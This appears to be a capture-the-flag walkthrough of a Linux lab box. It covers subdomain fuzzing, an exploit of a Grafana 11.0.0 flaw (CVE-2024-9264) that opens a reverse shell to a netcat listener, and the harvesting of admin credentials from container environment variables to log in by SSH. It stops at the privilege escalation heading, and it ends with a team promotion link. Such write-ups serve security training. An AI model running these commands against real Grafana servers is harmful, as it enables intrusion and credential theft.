Difficulty: Easy
OS: Linux
Points: 20
Date: 2025-05-10

📝 Initial Access Info

We begin this assessment with credentials commonly provided in real-life pentests:

Username: admin  
Password: 0D5oT70Fq13EvB5r

🔍 Reconnaissance

🔎 Nmap Scan

nmap -sV -sC -oN scan BOX-IP

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-title: Edukate - Online Education Website
|_http-server-header: nginx/1.24.0 (Ubuntu)

🌐 Web Enumeration

📌 Main Site - http://planning.htb

  • Title: Edukate - Online Education Website

  • Web Server: nginx/1.24.0

🔎 Subdomain Discovery

Using ffuf with the top subdomain wordlist:
bash
CopyEdit

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host: FUZZ.planning.htb" -u http://BOX-IP -ac -v

Found Subdomain: `grafana.planning.htb

⚙️ Grafana Exploitation

Upon visiting http://grafana.planning.htb, we identified:

  • Version: Grafana 11.0.0

  • Login using provided credentials failed

  • This version is vulnerable to CVE-2024-9264 (Auth RCE)

https://github.com/z3k0sec/CVE-2024-9264-RCE-Exploit?tab=readme-ov-file

🧨 Exploiting CVE-2024-9264

Started listener:

nc -lvnp 9001

Executed exploit:

python poc.py --url http://grafana.planning.htb --username admin --password 0D5oT70Fq13EvB5r --reverse-ip YOUR-IP --reverse-port 9001

✅ Got reverse shell as root inside Docker container
⚠️ Note: This shell is inside a container, not the actual host.
An image to describe post

🔐 Enumerating Environment

From within the container, we enumerated environment variables and discovered SSH credentials for a real system user using ENV command .

# env
GF_PATHS_HOME=/usr/share/grafana
HOSTNAME=7ce659d667d7
AWS_AUTH_EXTERNAL_ID=
SHLVL=1
HOME=/usr/share/grafana
AWS_AUTH_AssumeRoleEnabled=true
GF_PATHS_LOGS=/var/log/grafana
_=/usr/bin/sh
GF_PATHS_PROVISIONING=/etc/grafana/provisioning
GF_PATHS_PLUGINS=/var/lib/grafana/plugins
PATH=/usr/local/bin:/usr/share/grafana/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
AWS_AUTH_AllowedAuthProviders=default,keys,credentials
GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!
AWS_AUTH_SESSION_DURATION=15m
GF_SECURITY_ADMIN_USER=enzo
GF_PATHS_DATA=/var/lib/grafana
GF_PATHS_CONFIG=/etc/grafana/grafana.ini
AWS_CW_LIST_METRICS_PAGE_LIMIT=500
PWD=/usr/share/grafana


we found
user : enzo
password : RioTecRANDEntANTAn image to describe post

ssh enzo@BOX-IP

🧠 User enzo exists on host — and we successfully logged in.
📄 User Flag: Found in /home/enzo/user.txt

📈 Privilege Escalation

If you want to make these articles yourself and get access to them then join our CTF team at: https://kaizenl.ink/ctf